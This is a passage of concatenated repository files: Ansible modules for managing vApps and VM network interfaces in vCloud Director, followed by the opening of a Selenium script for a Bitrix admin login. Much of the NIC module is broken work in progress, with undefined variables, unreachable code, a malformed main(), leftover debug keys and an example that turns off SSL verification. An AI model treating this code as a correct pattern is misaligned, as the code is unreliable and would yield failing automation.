ip_allocation_mode=ip_allocation_mode,
deploy=deploy,
power_on=power_on,
accept_all_eulas=accept_all_eulas,
memory=memory,
cpu=cpu,
disk_size=disk_size,
password=<PASSWORD>,
cust_script=cust_script,
vm_name=vm_name,
hostname=hostname,
ip_address=ip_address,
storage_profile=storage_profile,
network_adapter_type=network_adapter_type)
self.execute_task(create_vapp_task.Tasks.Task[0])
msg = 'Vapp {} has been created'
response['msg'] = msg.format(vapp_name)
response['changed'] = True
else:
msg = "Vapp {} is already present"
response['warnings'] = msg.format(vapp_name)
return response
def create(self):
params = self.params
catalog_name = params.get('catalog_name')
# vapp initialization if catalog has been provided
if catalog_name:
return self.instantiate()
vapp_name = params.get('vapp_name')
description = params.get('description')
network = params.get('network')
fence_mode = params.get('fence_mode')
accept_all_eulas = params.get('accept_all_eulas')
response = dict()
response['changed'] = False
try:
self.vdc.get_vapp(vapp_name)
except EntityNotFoundException:
create_vapp_task = self.vdc.create_vapp(
name=vapp_name,
description=description,
network=network,
fence_mode=fence_mode,
accept_all_eulas=accept_all_eulas)
self.execute_task(create_vapp_task.Tasks.Task[0])
msg = 'Vapp {} has been created'
response['msg'] = msg.format(vapp_name)
response['changed'] = True
else:
msg = "Vapp {} is already present"
response['warnings'] = msg.format(vapp_name)
return response
def delete(self):
vapp_name = self.params.get('vapp_name')
force = self.params.get('force')
response = dict()
response['changed'] = False
try:
self.vdc.get_vapp(vapp_name)
except EntityNotFoundException:
response['warnings'] = "Vapp {} is not present.".format(vapp_name)
else:
delete_vapp_task = self.vdc.delete_vapp(
name=vapp_name, force=force)
self.execute_task(delete_vapp_task)
response['msg'] = 'Vapp {} has been deleted.'.format(vapp_name)
response['changed'] = True
return response
def power_on(self):
vapp_name = self.params.get('vapp_name')
response = dict()
response['changed'] = False
vapp = self.get_vapp()
if vapp.is_powered_on():
msg = 'Vapp {} is already powered on'
response['warnings'] = msg.format(vapp_name)
return response
try:
vapp_resource = self.vdc.get_vapp(vapp_name)
vapp = VApp(self.client, name=vapp_name, resource=vapp_resource)
power_on_vapp_task = vapp.power_on()
self.execute_task(power_on_vapp_task)
msg = 'Vapp {} has been powered on'
response['msg'] = msg.format(vapp_name)
response['changed'] = True
except OperationNotSupportedException:
msg = 'Operation is not supported. You may have no VM(s) in {}'
response['warnings'] = msg.format(vapp_name)
return response
def power_off(self):
vapp_name = self.params.get('vapp_name')
response = dict()
response['changed'] = False
vapp = self.get_vapp()
if vapp.is_powered_off():
msg = 'Vapp {} is already powered off'
response['warnings'] = msg.format(vapp_name)
return response
try:
vapp_resource = self.vdc.get_vapp(vapp_name)
vapp = VApp(self.client, name=vapp_name, resource=vapp_resource)
power_off_vapp_task = vapp.power_off()
self.execute_task(power_off_vapp_task)
msg = 'Vapp {} has been powered off'
response['msg'] = msg.format(vapp_name)
response['changed'] = True
except OperationNotSupportedException:
msg = 'Operation is not supported. You may have no VM(s) in {}'
response['warnings'] = msg.format(vapp_name)
return response
def deploy(self):
vapp_name = self.params.get('vapp_name')
response = dict()
response['changed'] = False
vapp = self.get_vapp()
if vapp.is_deployed():
msg = 'Vapp {} is already deployed'
response['warnings'] = msg.format(vapp_name)
return response
vapp_resource = self.vdc.get_vapp(vapp_name)
vapp = VApp(self.client, name=vapp_name, resource=vapp_resource)
deploy_vapp_task = vapp.deploy()
self.execute_task(deploy_vapp_task)
msg = 'Vapp {} has been deployed'
response['msg'] = msg.format(vapp_name)
response['changed'] = True
return response
def undeploy(self):
vapp_name = self.params.get('vapp_name')
response = dict()
response['changed'] = False
vapp = self.get_vapp()
if not vapp.is_deployed():
msg = 'Vapp {} is already undeployed'
response['warnings'] = msg.format(vapp_name)
return response
vapp_resource = self.vdc.get_vapp(vapp_name)
vapp = VApp(self.client, name=vapp_name, resource=vapp_resource)
undeploy_vapp_task = vapp.undeploy(action="powerOff")
self.execute_task(undeploy_vapp_task)
response['msg'] = 'Vapp {} has been undeployed.'.format(vapp_name)
response['changed'] = True
return response
def list_vms(self):
vapp = self.get_vapp()
response = dict()
response['msg'] = list()
for vm in vapp.get_all_vms():
try:
ip = vapp.get_primary_ip(vm.get('name'))
except Exception:
ip = None
finally:
vm_details = {"name": vm.get('name'),
"status": VM_STATUSES[vm.get('status')],
"deployed": vm.get('deployed') == 'true',
"ip_address": ip
}
response['msg'].append(vm_details)
return response
def list_networks(self):
vapp = self.get_vapp()
response = dict()
networks = vapp.get_all_networks()
response['msg'] = [network.get(
'{' + NSMAP['ovf'] + '}name') for network in networks]
return response
def main():
argument_network_spec = vapp_network_argument_spec()
argument_merge_spec = vapp_merge_argument_spec()
argument_vapp_spec = vapp_argument_spec()
response = dict(
msg=dict(type='str')
)
module_network = VappNetwork(argument_spec=vapp_network_argument_spec, supports_check_mode=True)
#module_merge = VappNetwork(argument_spec=argument_spec, supports_check_mode=True)
module_vapp = VappNetwork(argument_spec=vapp_argument_spec, supports_check_mode=True)
module = (module_network, module_vapp)
try:
if not module.params.get('state'):
raise Exception('Please provide the state for the resource.')
response = module.manage_states()
module.exit_json(**response)
except Exception as error:
response['msg'] = error
module.fail_json(**response)
if __name__ == '__main__':
main()
```
#### File: ansible/modules/vcd_vapp_vm_interface.py
```python
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: vcd_vapp_vm_nic
short_description: Ansible Module to manage (add/delete/update) NICs in vApp VMs in vCloud Director.
version_added: "2.4"
description:
- "Ansible Module to manage (add/delete/update) NICs in vApp VMs."
options:
user:
description:
- vCloud Director user name
required: false
password:
description:
- vCloud Director user password
required: false
host:
description:
- vCloud Director host address
required: false
org:
description:
- Organization name on vCloud Director to access
required: false
api_version:
description:
- Pyvcloud API version
required: false
verify_ssl_certs:
description:
- whether to use secure connection to vCloud Director host
required: false
nic_id:
description:
- NIC ID (required for operation update, optional for state present)
required: false
nic_ids:
description:
- List of NIC IDs (required for state absent)
required: false
adapter_type:
description:
- Adapter type (VMXNET3, E1000E, ...)
required: false
network:
description:
- vApp network name
required: false
vm_name:
description:
- VM name
required: true
vapp:
description:
- vApp name
required: true
vdc:
description:
- VDC name
required: true
ip_allocation_mode:
description:
- IP allocation mode (DHCP, POOL or MANUAL)
required: false
ip_address:
description:
- NIC IP address (required for MANUAL IP allocation mode)
required: false
state:
description:
- state of nic (present/absent).
- One from state or operation has to be provided.
required: true
operation:
description:
- operation on nic (update/read).
- One from state or operation has to be provided.
required: false
author:
- <EMAIL>
'''
EXAMPLES = '''
- name: Test with a message
vcd_vapp_vm_nic:
user: terraform
password: <PASSWORD>
host: csa.sandbox.org
org: Terraform
api_version: 30
verify_ssl_certs: False
vm: "vm1"
vapp = "vapp1"
vdc = "vdc1"
nic_id = "2"
ip_allocation_mode = "MANUAL"
ip_address = "172.16.0.11"
state = "present"
'''
RETURN = '''
msg: success/failure message corresponding to nic state
changed: true if resource has been changed else false
'''
import os
import unittest
import yaml
from copy import deepcopy
from lxml import etree
from collections import defaultdict
from pyvcloud.vcd.vm import VM
from pyvcloud.vcd.org import Org
from pyvcloud.vcd.vdc import VDC
from pyvcloud.vcd.client import E
from pyvcloud.vcd.client import Client
from pyvcloud.vcd.client import ApiVersion
from pyvcloud.vcd.vapp import VApp
from collections import defaultdict
from pyvcloud.vcd.client import E_RASD
from pyvcloud.vcd.client import NSMAP
from pyvcloud.vcd.client import EntityType
from pyvcloud.vcd.client import find_link
from pyvcloud.vcd.client import IpAddressMode
from pyvcloud.vcd.client import MetadataDomain
from pyvcloud.vcd.client import MetadataValueType
from pyvcloud.vcd.client import MetadataVisibility
from pyvcloud.vcd.client import NSMAP
from pyvcloud.vcd.client import QueryResultFormat
from pyvcloud.vcd.client import RelationType
from pyvcloud.vcd.client import ResourceType
from pyvcloud.vcd.client import VCLOUD_STATUS_MAP
from pyvcloud.vcd.client import VmNicProperties
from pyvcloud.vcd.exceptions import EntityNotFoundException
from pyvcloud.vcd.exceptions import InvalidParameterException
from pyvcloud.vcd.exceptions import InvalidStateException
from pyvcloud.vcd.exceptions import MultipleRecordsException
from pyvcloud.vcd.exceptions import OperationNotSupportedException
from pyvcloud.vcd.metadata import Metadata
from pyvcloud.vcd.utils import retrieve_compute_policy_id_from_href
#from pyvcloud.vcd.utils import update_vm_compute_policy_element
from pyvcloud.vcd.utils import uri_to_api_uri
from ansible.module_utils.vcd import VcdAnsibleModule
from pyvcloud.vcd.exceptions import EntityNotFoundException, OperationNotSupportedException
VAPP_VM_NIC_STATES = ['present', 'absent', 'update']
VAPP_VM_NIC_OPERATIONS = ['read', 'validate']
def vapp_vm_nic_argument_spec():
return dict(
vm_name=dict(type='str', required=True),
vapp=dict(type='str', required=True),
vdc=dict(type='str', required=True),
nic_id=dict(type='int', required=False),
nic_ids=dict(type='list', required=False),
is_connected=dict(type='bool', required=False, default=False),
ip_allocation_mode=dict(type='str', required=False),
ip_address=dict(type='str', required=False),
network=dict(type='str', required=False),
adapter_type=dict(type='str', required=False),
is_primary=dict(type='bool', required=False, default=False),
state=dict(choices=VAPP_VM_NIC_STATES, required=False),
operation=dict(choices=VAPP_VM_NIC_OPERATIONS, required=False),
)
class VappVMNIC(VcdAnsibleModule):
def __init__(self, **kwargs):
super(VappVMNIC, self).__init__(**kwargs)
vapp_resource = self.get_resource()
vapp = VApp(self.client, resource=vapp_resource)
self.vapp = vapp
def manage_states(self):
state = self.params.get('state')
if state == "present":
return self.add_nic_ng()
if state == "update":
return self.update_nic()
if state == "absent":
return self.delete_nic()
if state == "validate":
return self.validate_nic()
def manage_operations(self):
operation = self.params.get('operation')
if operation == "read":
return self.read_nics()
if operation == "validate":
return self.validate_nic()
def create_list_with_present_nics(self):
response = defaultdict(dict)
response['changed'] = False
response['msg'] = []
present_nics_list = []
vm = self.get_vm()
nics = self.client.get_resource(
vm.resource.get('href') + '/networkConnectionSection')
for nic in nics.NetworkConnection:
present_nics_list.append(nic.NetworkConnectionIndex.text)
response['msg'].append({
'index': nic.NetworkConnectionIndex.text,
'network': nic.get('network')
})
self.present_nics_list = present_nics_list
return self.present_nics_list
# vapp_name = self.params.get('vapp')
# network = self.params.get('network')
# self.network = network
# self.vapp_name = vapp_name
# vdc = self.params.get('vdc')
# #vm_name = self.params.get('vm_name')
# vapp_resource = self.get_resource_ng()
# #vm_resource = self.get_vm_ng()
# nics_index_resource = self.get_vm_nics_ng()
# vapp = VApp(self.client, resource=vapp_resource)
# org_resource = Org(self.client, resource=self.client.get_org())
# vdc_resource = VDC(self.client, resource=org_resource.get_vdc(vdc))
# #vapp_vm_resource = vapp.get_vm_ng(vm_name)
# self.nics_index_resource = nics_index_resource
# #self.vm_resource = VM(self.client, resource=vapp_vm_resource)
# self.vapp_resource_href = vdc_resource.get_vapp_resource_href(name=vapp_name, entity_type=EntityType.VAPP)
# self.vapp_resource = self.client.get_vapp_resource(self.vapp_resource_href)
# #self.vm = VM(self.client, resource=vm_resource)
# self.vapp = vapp
# self.nic_mapping = defaultdict(list)
def get_vm_nic_section(self):
vm = self.get_vm()
return self.client.get_resource(
vm.resource.get('href') + '/networkConnectionSection')
def get_resource(self):
#vapp = self.params.get('vapp')
vdc = self.params.get('vdc')
org_resource = Org(self.client, resource=self.client.get_org())
vdc_resource = VDC(self.client, resource=org_resource.get_vdc(vdc))
vapp_resource_href = vdc_resource.get_resource_href(name=self.vapp, entity_type=EntityType.VAPP)
vapp_resource = self.client.get_resource(vapp_resource_href)
return vapp_resource
def get_vm_nics_ng(self):
vm = self.get_vm_ng()
return self.client.get_resource(
self.vapp_vm_resource.resource.get('href') + '/networkConnectionSection')
def return_nics_indexes(self):
nics_returned_indexes = self.get_vm_nics_ng()
nics_indexes = [int(nic.NetworkConnectionIndex) for nic in nics_returned_indexes.NetworkConnection]
nics_indexes.sort()
return self.nics_indexes
def get_vm_ng(self):
vm_resource = VM(self.client, resource=vapp_vm_resource)
vapp_vm_resource = vm.get_vm(self.params.get('vm_name'))
return VM(self.client, resource=vapp_vm_resource)
def get_vapp_resource(self):
vapp = self.params.get('vapp')
vdc = self.params.get('vdc')
org_resource = Org(self.client, resource=self.client.get_org())
vdc_resource = VDC(self.client, resource=org_resource.get_vdc(vdc))
vapp_resource = vdc_resource.get_vapp_resource_href(name=vapp, entity_type=EntityType.VAPP)
vapp_resource_htef = self.client.get_vapp_resource(vapp_resource)
return vapp_resource
def get_vm_resource(self):
return vm_resource
def get_vm(self):
vapp_vm_resource = self.vapp.get_vm(self.params.get('vm_name'))
self.local_vm = VM(self.client, resource=vapp_vm_resource)
return VM(self.client, resource=vapp_vm_resource)
def get_vm_nics(self):
vm = self.get_vm()
return self.client.get_vapp_resource(vm.resource.get('href') + '/networkConnectionSection')
def add_nic_ng(self):
# get network connection section.
vm_name = self.params.get('vm_name')
nic_id = self.params.get('nic_id')
is_primary = self.params.get('is_primary')
network_name = self.params.get('network')
is_connected = self.params.get('is_connected')
ip_address = self.params.get('ip_address')
ip_allocation_mode = self.params.get('ip_allocation_mode')
adapter_type = self.params.get('adapter_type')
self.nic_id = nic_id
self.network_name = network_name
self.ip_address = ip_address
self.is_connected = is_connected
net_conn_section = self.get_vapp_resource()
nic_index = self.nic_id
insert_index = net_conn_section.index(
net_conn_section['{' + NSMAP['ovf'] + '}Info']) + 1
# check if any nics exists
if hasattr(net_conn_section, 'PrimaryNetworkConnectionIndex'):
# calculate nic index and create the networkconnection object.
indices = [None] * 10
insert_index = net_conn_section.index(
net_conn_section.PrimaryNetworkConnectionIndex) + 1
for nc in net_conn_section.NetworkConnection:
indices[int(nc.NetworkConnectionIndex.
text)] = nc.NetworkConnectionIndex.text
nic_index = indices.index(None)
if nic_index:
net_conn_section.NetworkConnectionIndex = E.NetworkConnectionIndex(nic_index)
net_conn = E.NetworkConnection(network=network_name)
net_conn.set('needsCustomization', 'true')
net_conn.append(E.NetworkConnectionIndex(nic_index))
if ip_allocation_mode == IpAddressMode.MANUAL.value:
net_conn.append(E.IpAddress(ip_address))
else:
net_conn.append(E.IpAddress())
net_conn.append(E.IsConnected(is_connected))
net_conn.append(E.IpAddressAllocationMode(ip_allocation_mode))
net_conn.append(E.NetworkAdapterType(adapter_type))
net_conn_section.insert(insert_index, net_conn)
vm_resource = self.get_vapp_resource()
vm_resource.NetworkConnectionSection = net_conn_section
return self.client.post_linked_resource(
vm_resource, RelationType.RECONFIGURE_VM, EntityType.VM.value,
vm_resource)
self.net_conn = net_conn
def net_connection_obj_create(self):
net_conn = E.NetworkConnection(network=network_name)
net_conn.set('needsCustomization', 'true')
net_conn.append(E.NetworkConnectionIndex(nic_index))
if ip_address_mode == IpAddressMode.MANUAL.value:
net_conn.append(E.IpAddress(ip_address))
else:
net_conn.append(E.IpAddress())
net_conn.append(E.IsConnected(is_connected))
net_conn.append(E.IpAddressAllocationMode(ip_address_mode))
net_conn.append(E.NetworkAdapterType(adapter_type))
net_conn_section.insert(insert_index, net_conn)
def net_connection_section_obj_create(self):
net_conn_section = self.get_vapp_resource()
#
insert_index = net_conn_section.index(
net_conn_section['{' + NSMAP['ovf'] + '}Info']) + 1
# check if any nics exists
if hasattr(net_conn_section, 'PrimaryNetworkConnectionIndex'):
# calculate nic index and create the networkconnection object.
indices = [None] * 10
insert_index = net_conn_section.index(
net_conn_section.PrimaryNetworkConnectionIndex) + 1
for nc in net_conn_section.NetworkConnection:
indices[int(nc.NetworkConnectionIndex.
text)] = nc.NetworkConnectionIndex.text
nic_index = indices.index(None)
if is_primary:
net_conn_section.PrimaryNetworkConnectionIndex = \
E.PrimaryNetworkConnectionIndex(nic_index)
vm_resource = self.get_vapp_resource()
vm_resource.NetworkConnectionSection = net_conn_section
return self.client.post_linked_resource(
vm_resource, RelationType.RECONFIGURE_VM, EntityType.VM.value,
vm_resource)
def add_nic(self):
vm = self.get_vm()
vm_name = self.params.get('vm_name')
nic_id = self.params.get('nic_id')
network = self.params.get('network')
ip_address = self.params.get('ip_address')
ip_allocation_mode = self.params.get('ip_allocation_mode')
adapter_type = self.params.get('adapter_type')
uri = vm.resource.get('href') + '/networkConnectionSection'
response = defaultdict(dict)
response['changed'] = False
new_nic_id = None
nics = self.get_vm_nics()
nics_indexes = [int(nic.NetworkConnectionIndex) for nic in nics.NetworkConnection]
nics_indexes.sort()
for nic in nics.NetworkConnection:
if nic.NetworkConnectionIndex == nic_id:
response['warnings'] = 'NIC {} is already present on VM {}'.format(
nic_id, vm_name)
return response
if not adapter_type:
nics_adapters = [str(nic.NetworkAdapterType) for nic in nics.NetworkConnection]
adapter_type = nics_adapters[0] # select the first nic NetworkAdapterType
if nic_id is None or nic_id < 0:
for index, nic_index in enumerate(nics_indexes):
new_nic_id = nic_index + 1
if index != nic_index:
new_nic_id = index
break
nic_id = new_nic_id
if ip_allocation_mode not in ('DHCP', 'POOL', 'MANUAL'):
raise Exception('IpAllocationMode should be one of DHCP/POOL/MANUAL')
# if ip_allocation_mode in ('DHCP', 'POOL'):
# nic = E.NetworkConnection(
# E.NetworkConnectionIndex(nic_id),
# E.IsConnected(True),
# E.IpAddressAllocationMode(ip_allocation_mode),
# E.NetworkAdapterType(adapter_type),
# network=network)
# else:
# if not ip_address:
# raise Exception('IpAddress is missing.')
# nic = E.NetworkConnection(
# E.NetworkConnectionIndex(nic_id),
# E.IpAddress(ip_address),
# E.IsConnected(True),
# E.IpAddressAllocationMode(ip_allocation_mode),
# E.NetworkAdapterType(adapter_type),
# network=network)
add_nic_task = vm.add_nic(adapter_type=adapter_type,
is_connected=is_connected,
network_name=network,
ip_address_mode=ip_allocation_mode,
ip_address=ip_address,
network=network,
nic_id=nic_id
)
self.execute_task(add_nic_task)
response['msg'] = {
'nic_id': nic_id,
'adapter_type': adapter_type,
'ip_allocation_mode': ip_allocation_mode,
'ip_address': ip_address,
'network': network,
'is_connected': is_connected,
'malinki': "vecerinki"
}
response['changed'] = True
return response
# nics.NetworkConnection.addnext(nic)
# add_nic_task = self.client.put_resource(uri, nics, EntityType.NETWORK_CONNECTION_SECTION.value)
# self.execute_task(add_nic_task)
# response['msg'] = {
# 'nic_id': nic_id,
# 'adapter_type': adapter_type,
# 'ip_allocation_mode': ip_allocation_mode,
# 'ip_address': ip_address,
# 'network': network
# }
# response['changed'] = True
# return response
def validate_add_nic(self):
'''
Error - More than 10 Nics are not permissible in vCD
'''
vm = self.get_vm()
vm_name = self.params.get('vm_name')
nic_id = self.params.get('nic_id')
network = self.params.get('network')
ip_address = self.params.get('ip_address')
ip_allocation_mode = self.params.get('ip_allocation_mode')
adapter_type = self.params.get('adapter_type')
uri = vm.resource.get('href') + '/networkConnectionSection'
response = defaultdict(dict)
response['changed'] = False
new_nic_id = None
network_section = self.net_connection_section_obj_create()
net_conn = self.net_connection_obj_create()
nics = self.get_vm_nics()
nics_indexes = [int(nic.NetworkConnectionIndex) for nic in nics.NetworkConnection]
nics_indexes.sort()
for nic in nics.NetworkConnection:
if nic.NetworkConnectionIndex == nic_id:
response['warnings'] = 'Validate add: NIC {} is already present on VM {}'.format(
nic_id, vm_name)
return response
if not adapter_type:
nics_adapters = [int(nic.NetworkAdapterType) for nic in nics.NetworkConnection]
adapter_type = nics_adapters[0] # select the first nic NetworkAdapterType
if nic_id is None or nic_id < 0:
for index, nic_index in enumerate(nics_indexes):
new_nic_id = nic_index + 1
if index != nic_index:
new_nic_id = index
break
nic_id = new_nic_id
if ip_allocation_mode not in ('DHCP', 'POOL', 'MANUAL'):
raise Exception('IpAllocationMode should be one of DHCP/POOL/MANUAL')
if ip_allocation_mode in ('DHCP', 'POOL'):
nic = E.NetworkConnection(
E.NetworkConnectionIndex(nic_id),
E.IsConnected(True),
E.IpAddressAllocationMode(ip_allocation_mode),
E.NetworkAdapterType(adapter_type),
network=network)
else:
if not ip_address:
raise Exception('IpAddress is missing.')
nic = E.NetworkConnection(
E.NetworkConnectionIndex(nic_id),
E.IpAddress(ip_address),
E.IsConnected(True),
E.IpAddressAllocationMode(ip_allocation_mode),
E.NetworkAdapterType(adapter_type),
network=network)
nics.NetworkConnection.addnext(nic)
add_nic_task = self.client.put_resource(uri, nics, EntityType.NETWORK_CONNECTION_SECTION.value)
self.execute_task(add_nic_task)
response['msg'] = {
'nic_id': nic_id,
'adapter_type': adapter_type,
'ip_allocation_mode': ip_allocation_mode,
'ip_address': ip_address,
'network': network,
'Validate add: ': 'true'
}
response['changed'] = True
return response
def update_nic(self):
'''
Following update scenarios are covered
1. IP allocation mode change: DHCP, POOL, MANUAL
2. Update IP address in MANUAL mode
3. Network change
'''
vm = self.get_vm()
nic_id = self.params.get('nic_id')
network = self.params.get('network')
ip_address = self.params.get('ip_address')
ip_allocation_mode = self.params.get('ip_allocation_mode')
uri = vm.resource.get('href') + '/networkConnectionSection'
response = defaultdict(dict)
response['changed'] = False
nics = self.get_vm_nics()
nic_indexs = [nic.NetworkConnectionIndex for nic in nics.NetworkConnection]
if nic_id not in nic_indexs:
response['warnings'] = 'NIC not found.'
return response
nic_to_update = nic_indexs.index(nic_id)
if network:
nics.NetworkConnection[nic_to_update].set('network', network)
response['changed'] = True
if ip_allocation_mode:
allocation_mode_element = E.IpAddressAllocationMode(ip_allocation_mode)
nics.NetworkConnection[nic_to_update].IpAddressAllocationMode = allocation_mode_element
response['changed'] = True
if ip_address:
response['changed'] = True
if hasattr(nics.NetworkConnection[nic_to_update], 'IpAddress'):
nics.NetworkConnection[nic_to_update].IpAddress = E.IpAddress(ip_address)
else:
network = nics.NetworkConnection[nic_to_update].get('network')
nics.NetworkConnection[nic_to_update] = E.NetworkConnection(
E.NetworkConnectionIndex(nic_id),
E.IpAddress(ip_address),
E.IsConnected(True),
E.IpAddressAllocationMode(ip_allocation_mode),
network=network)
if response['changed']:
update_nic_task = self.client.put_resource(uri, nics, EntityType.NETWORK_CONNECTION_SECTION.value)
self.execute_task(update_nic_task)
response['msg'] = 'vApp VM nic has been updated.'
return response
def validate_nic(self):
'''
Following update scenarios are covered
1. IP allocation mode change: DHCP, POOL, MANUAL
2. Update IP address in MANUAL mode
3. Network change
'''
vm = self.get_vm()
nic_id = self.params.get('nic_id')
network = self.params.get('network')
ip_address = self.params.get('ip_address')
adapter_type = self.params.get('adapter_type')
is_connected = self.params.get('is_connected')
ip_allocation_mode = self.params.get('ip_allocation_mode')
uri = vm.resource.get('href') + '/networkConnectionSection'
response = defaultdict(dict)
response['changed'] = False
vm_name = self.params.get('vm_name')
nics = self.get_vm_nics()
nic_indexes = []
if hasattr(nics, "NetworkConnection"):
# If we find attr in nics object
for nic in nics.NetworkConnection:
nic_indexes.append(nic.NetworkConnectionIndex)
self.nic_indexes = nic_indexes
return self.nic_indexes
else:
#if getattr(nics, 'NetworkConnection', None):
# Go add nic because no any adapters are present in VM
# we find attr in nics object
# nic_id = self.params.get('nic_id')
# nic = E.NetworkConnection(
# E.NetworkConnectionIndex(nic_id),
# E.IpAddress(ip_address),
# E.IsConnected(True),
# E.IpAddressAllocationMode(ip_allocation_mode),
# network=network)
add_nic_task = vm.add_nic(adapter_type=adapter_type,
is_connected=is_connected,
network_name=network,
ip_address_mode=ip_allocation_mode,
ip_address=ip_address,
nic_id=nic_id
)
self.execute_task(add_nic_task)
response['msg'] = {
'nic_id': nic_id,
'adapter_type': adapter_type,
'ip_allocation_mode': ip_allocation_mode,
'ip_address': ip_address,
'network': network,
'is_connected': is_connected,
'malinki': "vecerinki"
}
response['changed'] = True
nics = self.vm.list_nics()
nic_indexes = [nic.NetworkConnectionIndex for nic in nics.NetworkConnection]
# for nic in nics.NetworkConnection:
# nic_indexes.append(nic.NetworkConnectionIndex)
# self.nic_indexes = nic_indexes
# return self.nic_indexes
return response
# # adding_nic = self.execute_task(add_nic_task)
# nics.NetworkConnection.addnext(nic_id)
# #add_nic_task = self.client.put_resource(uri, nics, EntityType.NETWORK_CONNECTION_SECTION.value)
# self.execute_task(add_nic_task)
# response['msg'] = {
# 'VM': vm_name,
# 'A added nic with ID:': nic_id,
# 'ip_allocation_mode': ip_allocation_mode,
# 'ip_address': ip_address,
# 'we_at_here': "we_at_here"
# }
# response['changed'] = True
# return response
# # response['msg'] = 'A new nic has been added to VM {0}, NICs list: {1}'.format(vm_name,str(nics))
# # response['changed'] = True
# # return self.add_nic()
# #else:
if nic_id not in nic_indexes:
response['changed'] = 'go add NIC, because his not are found.'
return self.validate_add_nic()
#response['warnings'] = 'NIC not found.'
# nic_to_update = nic_indexes.index(nic_id)
if network:
nics.NetworkConnection[nic_id].set('network', network)
response['changed'] = True
if ip_allocation_mode:
allocation_mode_element = E.IpAddressAllocationMode(ip_allocation_mode)
nics.NetworkConnection[nic_id].IpAddressAllocationMode = allocation_mode_element
response['changed'] = True
if ip_address:
response['changed'] = True
if hasattr(nics.NetworkConnection[nic_id], 'IpAddress'):
nics.NetworkConnection[nic_id].IpAddress = E.IpAddress(ip_address)
else:
network = nics.NetworkConnection[nic_id].get('network')
nics.NetworkConnection[nic_id] = E.NetworkConnection(
E.NetworkConnectionIndex(nic_id),
E.IpAddress(ip_address),
E.IsConnected(True),
E.IpAddressAllocationMode(ip_allocation_mode),
network=network)
if response['changed']:
update_nic_task = self.client.put_resource(uri, nics, EntityType.NETWORK_CONNECTION_SECTION.value)
self.execute_task(update_nic_task)
response['msg'] = 'vApp VM nic has been updated.'
return response
def read_nics(self):
response = defaultdict(dict)
response['changed'] = False
nics = self.get_vm_nics()
for nic in nics.NetworkConnection:
meta = defaultdict(dict)
nic_id = str(nic.NetworkConnectionIndex)
meta['Network'] = str(nic.get('network'))
meta['MACAddress'] = str(nic.MACAddress)
meta['IsConnected'] = str(nic.IsConnected)
meta['NetworkAdapterType'] = str(nic.NetworkAdapterType)
meta['NetworkConnectionIndex'] = str(nic.NetworkConnectionIndex)
meta['IpAddressAllocationMode'] = str(nic.IpAddressAllocationMode)
if hasattr(nic, 'IpAddress'):
meta['IpAddress'] = str(nic.IpAddress)
response['msg'][nic_id] = meta
return response
def delete_nic(self):
vm = self.get_vm()
nic_ids = self.params.get('nic_ids')
response = defaultdict(dict)
response['changed'] = False
uri = vm.resource.get('href') + '/networkConnectionSection'
nics = self.get_vm_nics()
for nic in nics.NetworkConnection:
if nic.NetworkConnectionIndex in nic_ids:
nics.remove(nic)
nic_ids.remove(nic.NetworkConnectionIndex)
if len(nic_ids) > 0:
nic_ids = [str(nic_id) for nic_id in nic_ids]
err_msg = 'Can\'t find the specified VM nic(s) {0}'.format(','.join(nic_ids))
raise EntityNotFoundException(err_msg)
remove_nic_task = self.client.put_resource(uri, nics, EntityType.NETWORK_CONNECTION_SECTION.value)
self.execute_task(remove_nic_task)
response['msg'] = 'VM nic(s) has been deleted.'
response['changed'] = True
return response
def main():
argument_spec = vapp_vm_nic_argument_spec()
response = dict(
msg=dict(type='str')
)
module = VappVMNIC(argument_spec=argument_spec, supports_check_mode=True)
try:
if module.params.get('state'):
response = module.manage_states()
elif module.params.get('operation'):
response = module.manage_operations()
else:
raise Exception('One of the state/operation should be provided.')
except Exception as error:
response['msg'] = error
module.fail_json(**response)
module.exit_json(**response)
if __name__ == '__main__':
main()
```
#### File: docker-selenium/templates/4_marketplace.py
```python
import logging
import time
import os
import sys
import collections
import selenium.webdriver
import selenium.webdriver.support.ui as ui
import logging.handlers as handlers
from logging.handlers import RotatingFileHandler
from selenium import webdriver
from selenium.webdriver import ActionChains
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import Select
from selenium.common.exceptions import TimeoutException as SeleniumTimeoutException
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import WebDriverException
from selenium.common.exceptions import StaleElementReferenceException
from selenium.webdriver.support.wait import WebDriverWait
from elements import *
from helpers import *
TIMEOUT = 10
SLOWPOKE_TIMEOUT = 100
def configure_logger():
scriptlogger = logging.getLogger('')
scriptlogger.setLevel(logging.INFO)
format = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s")
to_stdout = logging.StreamHandler(sys.stdout)
to_stdout.setFormatter(format)
scriptlogger.addHandler(to_stdout)
to_file = handlers.RotatingFileHandler(filename='/tmp/selenium-marketplace-install.log', maxBytes=(1048576*5), backupCount=7)
to_file.setFormatter(format)
scriptlogger.addHandler(to_file)
def wait_element_by_xpath(driver, element):
logging.info('driver: {0} element: {1}'.format(driver, element))
try:
wait = WebDriverWait(driver, 10)
my_current_element = wait.until(EC.presence_of_element_located((By.XPATH, element)))
logging.info('my_current_element: {0}'.format(my_current_element))
except:
time.sleep(2)
logging.info('Not found element: {0}'.format(element))
pass
logging.info('element: {0}'.format(element))
# MAIN SETTINGS
def click_xpath_module_contain_main(driver, modulename):
logging.info('driver: {0} modulename: {1}'.format(driver, modulename))
request_path_main_element = (".//*[contains(@id, '{0}')]").format(modulename)
logging.info('request_path_main_element: {0}'.format(request_path_main_element))
request_path_second_element = ("//*[substring-after(name(), 'TEMPLATE') = '']")
next_button = '//option[@value="main"]'
logging.info('request_path_second_element: {0}'.format(request_path_second_element))
request_to_xpath = '{0}{1}{2}'.format(request_path_main_element, request_path_second_element, next_button)
logging.info('request_to_xpath: {0}'.format(request_to_xpath))
wait_element_by_xpath(driver, request_to_xpath)
finded_element = driver.find_element(By.XPATH, request_to_xpath).click()
logging.info('We perform delete finded_element: {0}'.format(finded_element))
finded_element_next_button = driver.find_element(By.XPATH, request_to_xpath).click()
def login_to_admin():
logging.info('Logger Ok')
global bitrix_ip
#bitrix_ip = "production.toprussianbloggers.ru"
bitrix_ip = "{{ bitrixip.stdout }}"
#bitrix_url = "http://" + bitrix_ip
global bitrix_url
bitrix_url = "http://" + bitrix_ip
global bitrix_url_admin
